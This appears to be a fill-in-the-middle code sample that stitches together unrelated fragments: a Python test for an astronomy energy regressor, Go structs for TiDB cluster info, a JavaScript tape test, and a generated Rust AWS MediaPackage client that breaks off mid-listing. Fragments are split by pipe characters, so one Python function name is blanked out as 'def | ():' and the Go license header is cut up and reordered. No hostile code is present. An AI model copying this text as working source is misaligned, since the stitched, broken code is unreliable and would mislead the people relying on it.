target_list = {"FlashCam": np.array([1, 2, 3, 0.9]) * u.TeV,
"ASTRICam": np.array([1, 2, 3, 0.9]) * u.TeV}
reg = EnergyRegressor(cam_id_list=cam_id_list, n_estimators=10)
reg.fit(feature_list, target_list)
return reg, cam_id_list
def | ():
reg, cam_id_list = test_prepare_model()
with TemporaryDirectory() as d:
temp_path = "/".join([d, "reg_{cam_id}.pkl"])
reg.save(temp_path)
reg = EnergyRegressor.load(temp_path, cam_id_list)
return reg, cam_id_list
def test_predict_by_event():
np.random.seed(3)
reg, cam_id_list = test_fit_save_load()
prediction = reg.predict_by_event([{"ASTRICam": [[10, 1]]},
{"ASTRICam": [[20, 2]]},
{"ASTRICam": [[30, 3]]}])
assert_allclose(prediction["mean"].value, [1, 2, 3], rtol=0.2)
prediction = reg.predict_by_event([{"FlashCam": [[1, 10]]},
{"FlashCam": [[2, 20]]},
{"FlashCam": [[3, 30]]}])
assert_allclose(prediction["mean"].value, [1, 2, 3], rtol=0.2)
| test_fit_save_load |
clusterinfo.go | // Copyright 2020 PingCAP, Inc. | //
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// See the License for the specific language governing permissions and
// limitations under the License.
package clusterinfo
type ComponentStatus uint
const (
// ComponentStatusUnreachable means unreachable or disconnected
ComponentStatusUnreachable ComponentStatus = 0
ComponentStatusUp ComponentStatus = 1
ComponentStatusTombstone ComponentStatus = 2
ComponentStatusOffline ComponentStatus = 3
// PD's Store may have state name down.
ComponentStatusDown ComponentStatus = 4
)
type PDInfo struct {
Version string `json:"version"`
IP string `json:"ip"`
Port uint `json:"port"`
DeployPath string `json:"deploy_path"`
Status ComponentStatus `json:"status"`
StartTimestamp int64 `json:"start_timestamp"`
}
type TiDBInfo struct {
Version string `json:"version"`
IP string `json:"ip"`
Port uint `json:"port"`
BinaryPath string `json:"binary_path"`
Status ComponentStatus `json:"status"`
StatusPort uint `json:"status_port"`
StartTimestamp int64 `json:"start_timestamp"`
}
type TiKVInfo struct {
Version string `json:"version"`
IP string `json:"ip"`
Port uint `json:"port"`
BinaryPath string `json:"binary_path"`
Status ComponentStatus `json:"status"`
StatusPort uint `json:"status_port"`
Labels map[string]string `json:"labels"`
StartTimestamp int64 `json:"start_timestamp"`
}
type AlertManagerInfo struct {
IP string `json:"ip"`
Port uint `json:"port"`
BinaryPath string `json:"binary_path"`
}
type GrafanaInfo struct {
IP string `json:"ip"`
Port uint `json:"port"`
BinaryPath string `json:"binary_path"`
} | //
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at |
test.js | var test = require('tape')
var flash = require('./')
test('noop on server side', function (t) { | t.plan(1)
t.doesNotThrow(function () { flash('whatever') })
}) | |
client.rs | // Code generated by software.amazon.smithy.rust.codegen.smithy-rs. DO NOT EDIT.
#[derive(Debug)]
pub(crate) struct Handle {
pub(crate) client: aws_smithy_client::Client<
aws_smithy_client::erase::DynConnector,
aws_smithy_client::erase::DynMiddleware<aws_smithy_client::erase::DynConnector>,
>,
pub(crate) conf: crate::Config,
}
/// Client for AWS Elemental MediaPackage
///
/// Client for invoking operations on AWS Elemental MediaPackage. Each operation on AWS Elemental MediaPackage is a method on this
/// this struct. `.send()` MUST be invoked on the generated operations to dispatch the request to the service.
///
/// # Examples
/// **Constructing a client and invoking an operation**
/// ```rust,no_run
/// # async fn docs() {
/// // create a shared configuration. This can be used & shared between multiple service clients.
/// let shared_config = aws_config::load_from_env().await;
/// let client = aws_sdk_mediapackage::Client::new(&shared_config);
/// // invoke an operation
/// /* let rsp = client
/// .<operation_name>().
/// .<param>("some value")
/// .send().await; */
/// # }
/// ```
/// **Constructing a client with custom configuration**
/// ```rust,no_run
/// use aws_config::RetryConfig;
/// # async fn docs() {
/// let shared_config = aws_config::load_from_env().await;
/// let config = aws_sdk_mediapackage::config::Builder::from(&shared_config)
/// .retry_config(RetryConfig::disabled())
/// .build();
/// let client = aws_sdk_mediapackage::Client::from_conf(config);
/// # }
#[derive(std::fmt::Debug)]
pub struct Client {
handle: std::sync::Arc<Handle>,
}
impl std::clone::Clone for Client {
fn clone(&self) -> Self {
Self {
handle: self.handle.clone(),
}
}
}
#[doc(inline)]
pub use aws_smithy_client::Builder;
impl
From<
aws_smithy_client::Client<
aws_smithy_client::erase::DynConnector,
aws_smithy_client::erase::DynMiddleware<aws_smithy_client::erase::DynConnector>,
>,
> for Client
{
fn from(
client: aws_smithy_client::Client<
aws_smithy_client::erase::DynConnector,
aws_smithy_client::erase::DynMiddleware<aws_smithy_client::erase::DynConnector>,
>,
) -> Self {
Self::with_config(client, crate::Config::builder().build())
}
}
impl Client {
/// Creates a client with the given service configuration.
pub fn with_config(
client: aws_smithy_client::Client<
aws_smithy_client::erase::DynConnector,
aws_smithy_client::erase::DynMiddleware<aws_smithy_client::erase::DynConnector>,
>,
conf: crate::Config,
) -> Self {
Self {
handle: std::sync::Arc::new(Handle { client, conf }),
}
}
/// Returns the client's configuration.
pub fn conf(&self) -> &crate::Config {
&self.handle.conf
}
}
impl Client {
/// Constructs a fluent builder for the [`ConfigureLogs`](crate::client::fluent_builders::ConfigureLogs) operation.
///
/// - The fluent builder is configurable:
/// - [`egress_access_logs(EgressAccessLogs)`](crate::client::fluent_builders::ConfigureLogs::egress_access_logs) / [`set_egress_access_logs(Option<EgressAccessLogs>)`](crate::client::fluent_builders::ConfigureLogs::set_egress_access_logs): Configure egress access logging.
/// - [`id(impl Into<String>)`](crate::client::fluent_builders::ConfigureLogs::id) / [`set_id(Option<String>)`](crate::client::fluent_builders::ConfigureLogs::set_id): The ID of the channel to log subscription.
/// - [`ingress_access_logs(IngressAccessLogs)`](crate::client::fluent_builders::ConfigureLogs::ingress_access_logs) / [`set_ingress_access_logs(Option<IngressAccessLogs>)`](crate::client::fluent_builders::ConfigureLogs::set_ingress_access_logs): Configure ingress access logging.
/// - On success, responds with [`ConfigureLogsOutput`](crate::output::ConfigureLogsOutput) with field(s):
/// - [`arn(Option<String>)`](crate::output::ConfigureLogsOutput::arn): The Amazon Resource Name (ARN) assigned to the Channel.
/// - [`description(Option<String>)`](crate::output::ConfigureLogsOutput::description): A short text description of the Channel.
/// - [`egress_access_logs(Option<EgressAccessLogs>)`](crate::output::ConfigureLogsOutput::egress_access_logs): Configure egress access logging.
/// - [`hls_ingest(Option<HlsIngest>)`](crate::output::ConfigureLogsOutput::hls_ingest): An HTTP Live Streaming (HLS) ingest resource configuration.
/// - [`id(Option<String>)`](crate::output::ConfigureLogsOutput::id): The ID of the Channel.
/// - [`ingress_access_logs(Option<IngressAccessLogs>)`](crate::output::ConfigureLogsOutput::ingress_access_logs): Configure ingress access logging.
/// - [`tags(Option<HashMap<String, String>>)`](crate::output::ConfigureLogsOutput::tags): A collection of tags associated with a resource
/// - On failure, responds with [`SdkError<ConfigureLogsError>`](crate::error::ConfigureLogsError)
pub fn configure_logs(&self) -> fluent_builders::ConfigureLogs {
fluent_builders::ConfigureLogs::new(self.handle.clone())
}
/// Constructs a fluent builder for the [`CreateChannel`](crate::client::fluent_builders::CreateChannel) operation.
///
/// - The fluent builder is configurable:
/// - [`description(impl Into<String>)`](crate::client::fluent_builders::CreateChannel::description) / [`set_description(Option<String>)`](crate::client::fluent_builders::CreateChannel::set_description): A short text description of the Channel.
/// - [`id(impl Into<String>)`](crate::client::fluent_builders::CreateChannel::id) / [`set_id(Option<String>)`](crate::client::fluent_builders::CreateChannel::set_id): The ID of the Channel. The ID must be unique within the region and it cannot be changed after a Channel is created.
/// - [`tags(HashMap<String, String>)`](crate::client::fluent_builders::CreateChannel::tags) / [`set_tags(Option<HashMap<String, String>>)`](crate::client::fluent_builders::CreateChannel::set_tags): A collection of tags associated with a resource
/// - On success, responds with [`CreateChannelOutput`](crate::output::CreateChannelOutput) with field(s):
/// - [`arn(Option<String>)`](crate::output::CreateChannelOutput::arn): The Amazon Resource Name (ARN) assigned to the Channel.
/// - [`description(Option<String>)`](crate::output::CreateChannelOutput::description): A short text description of the Channel.
/// - [`egress_access_logs(Option<EgressAccessLogs>)`](crate::output::CreateChannelOutput::egress_access_logs): Configure egress access logging.
/// - [`hls_ingest(Option<HlsIngest>)`](crate::output::CreateChannelOutput::hls_ingest): An HTTP Live Streaming (HLS) ingest resource configuration.
/// - [`id(Option<String>)`](crate::output::CreateChannelOutput::id): The ID of the Channel.
/// - [`ingress_access_logs(Option<IngressAccessLogs>)`](crate::output::CreateChannelOutput::ingress_access_logs): Configure ingress access logging.
/// - [`tags(Option<HashMap<String, String>>)`](crate::output::CreateChannelOutput::tags): A collection of tags associated with a resource
/// - On failure, responds with [`SdkError<CreateChannelError>`](crate::error::CreateChannelError)
pub fn create_channel(&self) -> fluent_builders::CreateChannel {
fluent_builders::CreateChannel::new(self.handle.clone())
}
/// Constructs a fluent builder for the [`CreateHarvestJob`](crate::client::fluent_builders::CreateHarvestJob) operation.
///
/// - The fluent builder is configurable:
/// - [`end_time(impl Into<String>)`](crate::client::fluent_builders::CreateHarvestJob::end_time) / [`set_end_time(Option<String>)`](crate::client::fluent_builders::CreateHarvestJob::set_end_time): The end of the time-window which will be harvested
/// - [`id(impl Into<String>)`](crate::client::fluent_builders::CreateHarvestJob::id) / [`set_id(Option<String>)`](crate::client::fluent_builders::CreateHarvestJob::set_id): The ID of the HarvestJob. The ID must be unique within the region and it cannot be changed after the HarvestJob is submitted
/// - [`origin_endpoint_id(impl Into<String>)`](crate::client::fluent_builders::CreateHarvestJob::origin_endpoint_id) / [`set_origin_endpoint_id(Option<String>)`](crate::client::fluent_builders::CreateHarvestJob::set_origin_endpoint_id): The ID of the OriginEndpoint that the HarvestJob will harvest from. This cannot be changed after the HarvestJob is submitted.
/// - [`s3_destination(S3Destination)`](crate::client::fluent_builders::CreateHarvestJob::s3_destination) / [`set_s3_destination(Option<S3Destination>)`](crate::client::fluent_builders::CreateHarvestJob::set_s3_destination): Configuration parameters for where in an S3 bucket to place the harvested content
/// - [`start_time(impl Into<String>)`](crate::client::fluent_builders::CreateHarvestJob::start_time) / [`set_start_time(Option<String>)`](crate::client::fluent_builders::CreateHarvestJob::set_start_time): The start of the time-window which will be harvested
/// - On success, responds with [`CreateHarvestJobOutput`](crate::output::CreateHarvestJobOutput) with field(s):
/// - [`arn(Option<String>)`](crate::output::CreateHarvestJobOutput::arn): The Amazon Resource Name (ARN) assigned to the HarvestJob.
/// - [`channel_id(Option<String>)`](crate::output::CreateHarvestJobOutput::channel_id): The ID of the Channel that the HarvestJob will harvest from.
/// - [`created_at(Option<String>)`](crate::output::CreateHarvestJobOutput::created_at): The time the HarvestJob was submitted
/// - [`end_time(Option<String>)`](crate::output::CreateHarvestJobOutput::end_time): The end of the time-window which will be harvested.
/// - [`id(Option<String>)`](crate::output::CreateHarvestJobOutput::id): The ID of the HarvestJob. The ID must be unique within the region and it cannot be changed after the HarvestJob is submitted.
/// - [`origin_endpoint_id(Option<String>)`](crate::output::CreateHarvestJobOutput::origin_endpoint_id): The ID of the OriginEndpoint that the HarvestJob will harvest from. This cannot be changed after the HarvestJob is submitted.
/// - [`s3_destination(Option<S3Destination>)`](crate::output::CreateHarvestJobOutput::s3_destination): Configuration parameters for where in an S3 bucket to place the harvested content
/// - [`start_time(Option<String>)`](crate::output::CreateHarvestJobOutput::start_time): The start of the time-window which will be harvested.
/// - [`status(Option<Status>)`](crate::output::CreateHarvestJobOutput::status): The current status of the HarvestJob. Consider setting up a CloudWatch Event to listen for HarvestJobs as they succeed or fail. In the event of failure, the CloudWatch Event will include an explanation of why the HarvestJob failed.
/// - On failure, responds with [`SdkError<CreateHarvestJobError>`](crate::error::CreateHarvestJobError)
pub fn create_harvest_job(&self) -> fluent_builders::CreateHarvestJob {
fluent_builders::CreateHarvestJob::new(self.handle.clone())
}
/// Constructs a fluent builder for the [`CreateOriginEndpoint`](crate::client::fluent_builders::CreateOriginEndpoint) operation.
///
/// - The fluent builder is configurable:
/// - [`authorization(Authorization)`](crate::client::fluent_builders::CreateOriginEndpoint::authorization) / [`set_authorization(Option<Authorization>)`](crate::client::fluent_builders::CreateOriginEndpoint::set_authorization): CDN Authorization credentials
/// - [`channel_id(impl Into<String>)`](crate::client::fluent_builders::CreateOriginEndpoint::channel_id) / [`set_channel_id(Option<String>)`](crate::client::fluent_builders::CreateOriginEndpoint::set_channel_id): The ID of the Channel that the OriginEndpoint will be associated with. This cannot be changed after the OriginEndpoint is created.
/// - [`cmaf_package(CmafPackageCreateOrUpdateParameters)`](crate::client::fluent_builders::CreateOriginEndpoint::cmaf_package) / [`set_cmaf_package(Option<CmafPackageCreateOrUpdateParameters>)`](crate::client::fluent_builders::CreateOriginEndpoint::set_cmaf_package): A Common Media Application Format (CMAF) packaging configuration.
/// - [`dash_package(DashPackage)`](crate::client::fluent_builders::CreateOriginEndpoint::dash_package) / [`set_dash_package(Option<DashPackage>)`](crate::client::fluent_builders::CreateOriginEndpoint::set_dash_package): A Dynamic Adaptive Streaming over HTTP (DASH) packaging configuration.
/// - [`description(impl Into<String>)`](crate::client::fluent_builders::CreateOriginEndpoint::description) / [`set_description(Option<String>)`](crate::client::fluent_builders::CreateOriginEndpoint::set_description): A short text description of the OriginEndpoint.
/// - [`hls_package(HlsPackage)`](crate::client::fluent_builders::CreateOriginEndpoint::hls_package) / [`set_hls_package(Option<HlsPackage>)`](crate::client::fluent_builders::CreateOriginEndpoint::set_hls_package): An HTTP Live Streaming (HLS) packaging configuration.
/// - [`id(impl Into<String>)`](crate::client::fluent_builders::CreateOriginEndpoint::id) / [`set_id(Option<String>)`](crate::client::fluent_builders::CreateOriginEndpoint::set_id): The ID of the OriginEndpoint. The ID must be unique within the region and it cannot be changed after the OriginEndpoint is created.
/// - [`manifest_name(impl Into<String>)`](crate::client::fluent_builders::CreateOriginEndpoint::manifest_name) / [`set_manifest_name(Option<String>)`](crate::client::fluent_builders::CreateOriginEndpoint::set_manifest_name): A short string that will be used as the filename of the OriginEndpoint URL (defaults to "index").
/// - [`mss_package(MssPackage)`](crate::client::fluent_builders::CreateOriginEndpoint::mss_package) / [`set_mss_package(Option<MssPackage>)`](crate::client::fluent_builders::CreateOriginEndpoint::set_mss_package): A Microsoft Smooth Streaming (MSS) packaging configuration.
/// - [`origination(Origination)`](crate::client::fluent_builders::CreateOriginEndpoint::origination) / [`set_origination(Option<Origination>)`](crate::client::fluent_builders::CreateOriginEndpoint::set_origination): Control whether origination of video is allowed for this OriginEndpoint. If set to ALLOW, the OriginEndpoint may by requested, pursuant to any other form of access control. If set to DENY, the OriginEndpoint may not be requested. This can be helpful for Live to VOD harvesting, or for temporarily disabling origination
/// - [`startover_window_seconds(i32)`](crate::client::fluent_builders::CreateOriginEndpoint::startover_window_seconds) / [`set_startover_window_seconds(i32)`](crate::client::fluent_builders::CreateOriginEndpoint::set_startover_window_seconds): Maximum duration (seconds) of content to retain for startover playback. If not specified, startover playback will be disabled for the OriginEndpoint.
/// - [`tags(HashMap<String, String>)`](crate::client::fluent_builders::CreateOriginEndpoint::tags) / [`set_tags(Option<HashMap<String, String>>)`](crate::client::fluent_builders::CreateOriginEndpoint::set_tags): A collection of tags associated with a resource
/// - [`time_delay_seconds(i32)`](crate::client::fluent_builders::CreateOriginEndpoint::time_delay_seconds) / [`set_time_delay_seconds(i32)`](crate::client::fluent_builders::CreateOriginEndpoint::set_time_delay_seconds): Amount of delay (seconds) to enforce on the playback of live content. If not specified, there will be no time delay in effect for the OriginEndpoint.
/// - [`whitelist(Vec<String>)`](crate::client::fluent_builders::CreateOriginEndpoint::whitelist) / [`set_whitelist(Option<Vec<String>>)`](crate::client::fluent_builders::CreateOriginEndpoint::set_whitelist): A list of source IP CIDR blocks that will be allowed to access the OriginEndpoint.
/// - On success, responds with [`CreateOriginEndpointOutput`](crate::output::CreateOriginEndpointOutput) with field(s):
/// - [`arn(Option<String>)`](crate::output::CreateOriginEndpointOutput::arn): The Amazon Resource Name (ARN) assigned to the OriginEndpoint.
/// - [`authorization(Option<Authorization>)`](crate::output::CreateOriginEndpointOutput::authorization): CDN Authorization credentials
/// - [`channel_id(Option<String>)`](crate::output::CreateOriginEndpointOutput::channel_id): The ID of the Channel the OriginEndpoint is associated with.
/// - [`cmaf_package(Option<CmafPackage>)`](crate::output::CreateOriginEndpointOutput::cmaf_package): A Common Media Application Format (CMAF) packaging configuration.
/// - [`dash_package(Option<DashPackage>)`](crate::output::CreateOriginEndpointOutput::dash_package): A Dynamic Adaptive Streaming over HTTP (DASH) packaging configuration.
/// - [`description(Option<String>)`](crate::output::CreateOriginEndpointOutput::description): A short text description of the OriginEndpoint.
/// - [`hls_package(Option<HlsPackage>)`](crate::output::CreateOriginEndpointOutput::hls_package): An HTTP Live Streaming (HLS) packaging configuration.
/// - [`id(Option<String>)`](crate::output::CreateOriginEndpointOutput::id): The ID of the OriginEndpoint.
/// - [`manifest_name(Option<String>)`](crate::output::CreateOriginEndpointOutput::manifest_name): A short string appended to the end of the OriginEndpoint URL.
/// - [`mss_package(Option<MssPackage>)`](crate::output::CreateOriginEndpointOutput::mss_package): A Microsoft Smooth Streaming (MSS) packaging configuration.
/// - [`origination(Option<Origination>)`](crate::output::CreateOriginEndpointOutput::origination): Control whether origination of video is allowed for this OriginEndpoint. If set to ALLOW, the OriginEndpoint may by requested, pursuant to any other form of access control. If set to DENY, the OriginEndpoint may not be requested. This can be helpful for Live to VOD harvesting, or for temporarily disabling origination
/// - [`startover_window_seconds(i32)`](crate::output::CreateOriginEndpointOutput::startover_window_seconds): Maximum duration (seconds) of content to retain for startover playback. If not specified, startover playback will be disabled for the OriginEndpoint.
/// - [`tags(Option<HashMap<String, String>>)`](crate::output::CreateOriginEndpointOutput::tags): A collection of tags associated with a resource
/// - [`time_delay_seconds(i32)`](crate::output::CreateOriginEndpointOutput::time_delay_seconds): Amount of delay (seconds) to enforce on the playback of live content. If not specified, there will be no time delay in effect for the OriginEndpoint.
/// - [`url(Option<String>)`](crate::output::CreateOriginEndpointOutput::url): The URL of the packaged OriginEndpoint for consumption.
/// - [`whitelist(Option<Vec<String>>)`](crate::output::CreateOriginEndpointOutput::whitelist): A list of source IP CIDR blocks that will be allowed to access the OriginEndpoint.
/// - On failure, responds with [`SdkError<CreateOriginEndpointError>`](crate::error::CreateOriginEndpointError)
pub fn create_origin_endpoint(&self) -> fluent_builders::CreateOriginEndpoint {
fluent_builders::CreateOriginEndpoint::new(self.handle.clone())
}
/// Constructs a fluent builder for the [`DeleteChannel`](crate::client::fluent_builders::DeleteChannel) operation.
///
/// - The fluent builder is configurable:
/// - [`id(impl Into<String>)`](crate::client::fluent_builders::DeleteChannel::id) / [`set_id(Option<String>)`](crate::client::fluent_builders::DeleteChannel::set_id): The ID of the Channel to delete.
/// - On success, responds with [`DeleteChannelOutput`](crate::output::DeleteChannelOutput)
/// - On failure, responds with [`SdkError<DeleteChannelError>`](crate::error::DeleteChannelError)
pub fn delete_channel(&self) -> fluent_builders::DeleteChannel {
fluent_builders::DeleteChannel::new(self.handle.clone())
}
/// Constructs a fluent builder for the [`DeleteOriginEndpoint`](crate::client::fluent_builders::DeleteOriginEndpoint) operation.
///
/// - The fluent builder is configurable:
/// - [`id(impl Into<String>)`](crate::client::fluent_builders::DeleteOriginEndpoint::id) / [`set_id(Option<String>)`](crate::client::fluent_builders::DeleteOriginEndpoint::set_id): The ID of the OriginEndpoint to delete.
/// - On success, responds with [`DeleteOriginEndpointOutput`](crate::output::DeleteOriginEndpointOutput)
/// - On failure, responds with [`SdkError<DeleteOriginEndpointError>`](crate::error::DeleteOriginEndpointError)
pub fn delete_origin_endpoint(&self) -> fluent_builders::DeleteOriginEndpoint {
fluent_builders::DeleteOriginEndpoint::new(self.handle.clone())
}
/// Constructs a fluent builder for the [`DescribeChannel`](crate::client::fluent_builders::DescribeChannel) operation.
///
/// - The fluent builder is configurable:
/// - [`id(impl Into<String>)`](crate::client::fluent_builders::DescribeChannel::id) / [`set_id(Option<String>)`](crate::client::fluent_builders::DescribeChannel::set_id): The ID of a Channel.
/// - On success, responds with [`DescribeChannelOutput`](crate::output::DescribeChannelOutput) with field(s):
/// - [`arn(Option<String>)`](crate::output::DescribeChannelOutput::arn): The Amazon Resource Name (ARN) assigned to the Channel.
/// - [`description(Option<String>)`](crate::output::DescribeChannelOutput::description): A short text description of the Channel.
/// - [`egress_access_logs(Option<EgressAccessLogs>)`](crate::output::DescribeChannelOutput::egress_access_logs): Configure egress access logging.
/// - [`hls_ingest(Option<HlsIngest>)`](crate::output::DescribeChannelOutput::hls_ingest): An HTTP Live Streaming (HLS) ingest resource configuration.
/// - [`id(Option<String>)`](crate::output::DescribeChannelOutput::id): The ID of the Channel.
/// - [`ingress_access_logs(Option<IngressAccessLogs>)`](crate::output::DescribeChannelOutput::ingress_access_logs): Configure ingress access logging.
/// - [`tags(Option<HashMap<String, String>>)`](crate::output::DescribeChannelOutput::tags): A collection of tags associated with a resource
/// - On failure, responds with [`SdkError<DescribeChannelError>`](crate::error::DescribeChannelError)
pub fn describe_channel(&self) -> fluent_builders::DescribeChannel {
fluent_builders::DescribeChannel::new(self.handle.clone())
}
/// Constructs a fluent builder for the [`DescribeHarvestJob`](crate::client::fluent_builders::DescribeHarvestJob) operation.
///
/// - The fluent builder is configurable:
/// - [`id(impl Into<String>)`](crate::client::fluent_builders::DescribeHarvestJob::id) / [`set_id(Option<String>)`](crate::client::fluent_builders::DescribeHarvestJob::set_id): The ID of the HarvestJob.
/// - On success, responds with [`DescribeHarvestJobOutput`](crate::output::DescribeHarvestJobOutput) with field(s):
/// - [`arn(Option<String>)`](crate::output::DescribeHarvestJobOutput::arn): The Amazon Resource Name (ARN) assigned to the HarvestJob.
/// - [`channel_id(Option<String>)`](crate::output::DescribeHarvestJobOutput::channel_id): The ID of the Channel that the HarvestJob will harvest from.
/// - [`created_at(Option<String>)`](crate::output::DescribeHarvestJobOutput::created_at): The time the HarvestJob was submitted
/// - [`end_time(Option<String>)`](crate::output::DescribeHarvestJobOutput::end_time): The end of the time-window which will be harvested.
/// - [`id(Option<String>)`](crate::output::DescribeHarvestJobOutput::id): The ID of the HarvestJob. The ID must be unique within the region and it cannot be changed after the HarvestJob is submitted.
/// - [`origin_endpoint_id(Option<String>)`](crate::output::DescribeHarvestJobOutput::origin_endpoint_id): The ID of the OriginEndpoint that the HarvestJob will harvest from. This cannot be changed after the HarvestJob is submitted.
/// - [`s3_destination(Option<S3Destination>)`](crate::output::DescribeHarvestJobOutput::s3_destination): Configuration parameters for where in an S3 bucket to place the harvested content
/// - [`start_time(Option<String>)`](crate::output::DescribeHarvestJobOutput::start_time): The start of the time-window which will be harvested.
/// - [`status(Option<Status>)`](crate::output::DescribeHarvestJobOutput::status): The current status of the HarvestJob. Consider setting up a CloudWatch Event to listen for HarvestJobs as they succeed or fail. In the event of failure, the CloudWatch Event will include an explanation of why the HarvestJob failed.
/// - On failure, responds with [`SdkError<DescribeHarvestJobError>`](crate::error::DescribeHarvestJobError)
pub fn describe_harvest_job(&self) -> fluent_builders::DescribeHarvestJob {
fluent_builders::DescribeHarvestJob::new(self.handle.clone())
}
/// Constructs a fluent builder for the [`DescribeOriginEndpoint`](crate::client::fluent_builders::DescribeOriginEndpoint) operation.
///
/// - The fluent builder is configurable:
/// - [`id(impl Into<String>)`](crate::client::fluent_builders::DescribeOriginEndpoint::id) / [`set_id(Option<String>)`](crate::client::fluent_builders::DescribeOriginEndpoint::set_id): The ID of the OriginEndpoint.
/// - On success, responds with [`DescribeOriginEndpointOutput`](crate::output::DescribeOriginEndpointOutput) with field(s):
/// - [`arn(Option<String>)`](crate::output::DescribeOriginEndpointOutput::arn): The Amazon Resource Name (ARN) assigned to the OriginEndpoint.
/// - [`authorization(Option<Authorization>)`](crate::output::DescribeOriginEndpointOutput::authorization): CDN Authorization credentials
/// - [`channel_id(Option<String>)`](crate::output::DescribeOriginEndpointOutput::channel_id): The ID of the Channel the OriginEndpoint is associated with.
/// - [`cmaf_package(Option<CmafPackage>)`](crate::output::DescribeOriginEndpointOutput::cmaf_package): A Common Media Application Format (CMAF) packaging configuration.
/// - [`dash_package(Option<DashPackage>)`](crate::output::DescribeOriginEndpointOutput::dash_package): A Dynamic Adaptive Streaming over HTTP (DASH) packaging configuration.
/// - [`description(Option<String>)`](crate::output::DescribeOriginEndpointOutput::description): A short text description of the OriginEndpoint.
/// - [`hls_package(Option<HlsPackage>)`](crate::output::DescribeOriginEndpointOutput::hls_package): An HTTP Live Streaming (HLS) packaging configuration.
/// - [`id(Option<String>)`](crate::output::DescribeOriginEndpointOutput::id): The ID of the OriginEndpoint.
/// - [`manifest_name(Option<String>)`](crate::output::DescribeOriginEndpointOutput::manifest_name): A short string appended to the end of the OriginEndpoint URL.
/// - [`mss_package(Option<MssPackage>)`](crate::output::DescribeOriginEndpointOutput::mss_package): A Microsoft Smooth Streaming (MSS) packaging configuration.
/// - [`origination(Option<Origination>)`](crate::output::DescribeOriginEndpointOutput::origination): Control whether origination of video is allowed for this OriginEndpoint. If set to ALLOW, the OriginEndpoint may by requested, pursuant to any other form of access control. If set to DENY, the OriginEndpoint may not be requested. This can be helpful for Live to VOD harvesting, or for temporarily disabling origination
/// - [`startover_window_seconds(i32)`](crate::output::DescribeOriginEndpointOutput::startover_window_seconds): Maximum duration (seconds) of content to retain for startover playback. If not specified, startover playback will be disabled for the OriginEndpoint.
/// - [`tags(Option<HashMap<String, String>>)`](crate::output::DescribeOriginEndpointOutput::tags): A collection of tags associated with a resource
/// - [`time_delay_seconds(i32)`](crate::output::DescribeOriginEndpointOutput::time_delay_seconds): Amount of delay (seconds) to enforce on the playback of live content. If not specified, there will be no time delay in effect for the OriginEndpoint.
/// - [`url(Option<String>)`](crate::output::DescribeOriginEndpointOutput::url): The URL of the packaged OriginEndpoint for consumption.
/// - [`whitelist(Option<Vec<String>>)`](crate::output::DescribeOriginEndpointOutput::whitelist): A list of source IP CIDR blocks that will be allowed to access the OriginEndpoint.
/// - On failure, responds with [`SdkError<DescribeOriginEndpointError>`](crate::error::DescribeOriginEndpointError)
pub fn describe_origin_endpoint(&self) -> fluent_builders::DescribeOriginEndpoint {
fluent_builders::DescribeOriginEndpoint::new(self.handle.clone())
}
/// Constructs a fluent builder for the [`ListChannels`](crate::client::fluent_builders::ListChannels) operation.
/// This operation supports pagination; See [`into_paginator()`](crate::client::fluent_builders::ListChannels::into_paginator).
///
/// - The fluent builder is configurable:
/// - [`max_results(i32)`](crate::client::fluent_builders::ListChannels::max_results) / [`set_max_results(i32)`](crate::client::fluent_builders::ListChannels::set_max_results): Upper bound on number of records to return.
/// - [`next_token(impl Into<String>)`](crate::client::fluent_builders::ListChannels::next_token) / [`set_next_token(Option<String>)`](crate::client::fluent_builders::ListChannels::set_next_token): A token used to resume pagination from the end of a previous request.
/// - On success, responds with [`ListChannelsOutput`](crate::output::ListChannelsOutput) with field(s):
/// - [`channels(Option<Vec<Channel>>)`](crate::output::ListChannelsOutput::channels): A list of Channel records.
/// - [`next_token(Option<String>)`](crate::output::ListChannelsOutput::next_token): A token that can be used to resume pagination from the end of the collection.
/// - On failure, responds with [`SdkError<ListChannelsError>`](crate::error::ListChannelsError)
pub fn list_channels(&self) -> fluent_builders::ListChannels {
fluent_builders::ListChannels::new(self.handle.clone())
}
/// Constructs a fluent builder for the [`ListHarvestJobs`](crate::client::fluent_builders::ListHarvestJobs) operation.
/// This operation supports pagination; See [`into_paginator()`](crate::client::fluent_builders::ListHarvestJobs::into_paginator).
///
/// - The fluent builder is configurable:
/// - [`include_channel_id(impl Into<String>)`](crate::client::fluent_builders::ListHarvestJobs::include_channel_id) / [`set_include_channel_id(Option<String>)`](crate::client::fluent_builders::ListHarvestJobs::set_include_channel_id): When specified, the request will return only HarvestJobs associated with the given Channel ID.
/// - [`include_status(impl Into<String>)`](crate::client::fluent_builders::ListHarvestJobs::include_status) / [`set_include_status(Option<String>)`](crate::client::fluent_builders::ListHarvestJobs::set_include_status): When specified, the request will return only HarvestJobs in the given status.
/// - [`max_results(i32)`](crate::client::fluent_builders::ListHarvestJobs::max_results) / [`set_max_results(i32)`](crate::client::fluent_builders::ListHarvestJobs::set_max_results): The upper bound on the number of records to return.
/// - [`next_token(impl Into<String>)`](crate::client::fluent_builders::ListHarvestJobs::next_token) / [`set_next_token(Option<String>)`](crate::client::fluent_builders::ListHarvestJobs::set_next_token): A token used to resume pagination from the end of a previous request.
/// - On success, responds with [`ListHarvestJobsOutput`](crate::output::ListHarvestJobsOutput) with field(s):
/// - [`harvest_jobs(Option<Vec<HarvestJob>>)`](crate::output::ListHarvestJobsOutput::harvest_jobs): A list of HarvestJob records.
/// - [`next_token(Option<String>)`](crate::output::ListHarvestJobsOutput::next_token): A token that can be used to resume pagination from the end of the collection.
/// - On failure, responds with [`SdkError<ListHarvestJobsError>`](crate::error::ListHarvestJobsError)
pub fn list_harvest_jobs(&self) -> fluent_builders::ListHarvestJobs {
fluent_builders::ListHarvestJobs::new(self.handle.clone())
}
/// Constructs a fluent builder for the [`ListOriginEndpoints`](crate::client::fluent_builders::ListOriginEndpoints) operation.
/// This operation supports pagination; See [`into_paginator()`](crate::client::fluent_builders::ListOriginEndpoints::into_paginator).
///
/// - The fluent builder is configurable:
/// - [`channel_id(impl Into<String>)`](crate::client::fluent_builders::ListOriginEndpoints::channel_id) / [`set_channel_id(Option<String>)`](crate::client::fluent_builders::ListOriginEndpoints::set_channel_id): When specified, the request will return only OriginEndpoints associated with the given Channel ID.
